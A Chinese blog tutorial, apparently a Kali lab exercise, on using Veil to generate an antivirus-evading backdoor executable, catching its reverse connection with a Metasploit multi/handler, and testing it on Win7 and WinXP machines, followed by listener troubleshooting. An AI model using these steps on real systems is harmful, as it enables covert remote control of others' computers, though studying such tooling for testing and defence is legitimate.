码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【kali-漏洞利用】(3.4)免杀Payload 生成工具(下):Veil后门使用、监听失败原因


    目录

    一、veil使用

    1.1、启动:

    1.2、分类

    1.3、利用msf测试

    启动:

    利用模块:

    1.4、免杀payload被运行

    win7

    winxp

    1.5、结果

    1.6、错误:


    一、veil使用

    1.1、启动:

    打开终端,并输入veil进入交互界面

    1.2、分类

    veil有两个免杀的⼯具:Evasion和Ordnance

    Evasion⽤来对⽂件进行免杀处理

    Ordnance可⽣成在Veil-Evasion中使⽤的shellcode

    1. use Evasion
    2. #选择Evasion功能

    1. list
    2. #查看payload列

    大多选用go和ruby语言编码的

    use 7

     Required Options:需要都填上(这里LHOST为空,要补上,其余的可以修改)

    1. Required Options:
    2. Name Value Description
    3. ---- ----- -----------
    4. COMPILE_TO_EXE Y Compile to an executable
    5. LHOST IP of the Metasploit handler
    6. LPORT 4444 Port of the Metasploit handler

    输入 generate 执行payload

    然后输入产生的文件名

    /var/lib/veil/output/compiled/test.exe

     Executable(可执行)

    Source code(源代码)

    Metasploit Resource(Metasploit资源)

    1.3、利用msf测试

    启动:

    sudo msfconsole -r /var/lib/veil/output/handlers/test.rc

     


    利用模块:

    use exploit/multi/handler

    show options

    set lhost 192.168.190.149

    exploit

    (然后开始监听了) 

    1.4、免杀payload被运行

    win7

    现在将后门放到目标机中(这里是win7)

    然后运行它

     

     

    winxp

    我现在试一下winxp

     

     

    1.5、结果

    winxp测试的2次,就是那个后门在winxp上运行时候报错

    然后监听失败

     


    win7测试的2次

    在win7上运行没有保错

     

     最后出现了会话控制

     

    1.6、无法监听错误改正

    错误过程一:

    无法监听到后门端口

    随机设置的端口没有开放

    1. lsof -i:端口号
    2. 没查到端口信息
    1. systemctl start firewalld
    2. firewall-cmd --zone=public --add-port=1935/tcp --permanent
    3. --zone #作用域
    4. --add-port=1935/tcp #添加端口,格式为:端口/通讯协议
    5. --permanent #永久生效,没有此参数重启后失效
    6. firewall-cmd --reload //重启防火墙

    1. netstat -ntlp //查看当前所有tcp端口·
    2. netstat -ntulp |grep 1935 //查看所有1935端口使用情况


    错误过程二:

    最后我认为是

    先用nmap扫描目标开放的tcp端口,然后再生成相应端口的木马

    使自己,和目标开放端口都一样


    最后错误原因

    是我启动的时候

    直接是sudo msfconsole


    正确做法:

    通过以下方法启动msfconsole

    sudo msfconsole -r /var/lib/veil/output/handlers/test.rc

  • 相关阅读:
    Java反射06:反射的应用之动态代理
    SkeyeGisMap地图扩展(五) 自定义形状
    matlab 将三维点云转换为二维激光雷达扫描
    adb pull 使用
    无脑安装HBASE后如何启动?
    【无标题】
    HiveSQL源码之语法词法编译文件解析一文详解
    改变金融贷款市场营销方式 ---- 运营商大数据精准获客
    21天Python进阶学习挑战赛打卡------第4天(字典)
    AI绘画API:提升艺术创作的效率和品质
  • 原文地址:https://blog.csdn.net/qq_53079406/article/details/126196753
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号